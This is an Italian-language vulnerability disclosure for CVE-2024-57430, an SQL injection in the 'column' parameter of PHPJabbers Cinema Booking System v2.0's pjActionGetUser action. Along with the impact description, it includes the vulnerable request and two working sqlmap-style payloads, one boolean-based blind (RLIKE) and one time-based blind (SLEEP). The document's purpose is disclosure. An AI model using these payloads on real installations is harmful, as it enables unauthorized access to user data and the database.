
CVE-2024-57430: PHPJabbers Cinema Booking System v2.0 è vulnerabile a SQL injection, che porta ad accesso non autorizzato ai dati e escalation dei privilegi.
Una vulnerabilità di SQL injection nella funzione pjActionGetUser di PHPJabbers Cinema Booking System v2.0 consente agli attaccanti di manipolare le query del database tramite il parametro column. Sfruttare questa falla può portare a divulgazione non autorizzata di informazioni, escalation dei privilegi o manipolazione del database.
Parametro vulnerabile: column
L'SQL injection può portare ad accesso non autorizzato a informazioni sensibili, modifica del database e persino al completo compromesso del server di database. Ciò rappresenta una minaccia critica per la riservatezza, l'integrità e la disponibilità dell'applicazione.
Richiesta GET sull'URL: http://127.0.0.1/CinemaBookingDev/index.php?controller=pjAdminUsers&action=pjActionGetUser&column=*&&direction=ASC&page=1&rowCount=10
Parameter: #1* (URI)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: http://127.0.0.1/CinemaBookingDev/index.php?controller=pjAdminUsers&action=pjActionGetUser&column=name RLIKE (SELECT (CASE WHEN (7874=7874) THEN 0x6e616d65 ELSE 0x28 END))&direction=ASC&page=1&rowCount=10
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: http://127.0.0.1/CinemaBookingDev/index.php?controller=pjAdminUsers&action=pjActionGetUser&column=name AND (SELECT 6530 FROM (SELECT(SLEEP(5)))UFOj)&direction=ASC&page=1&rowCount=10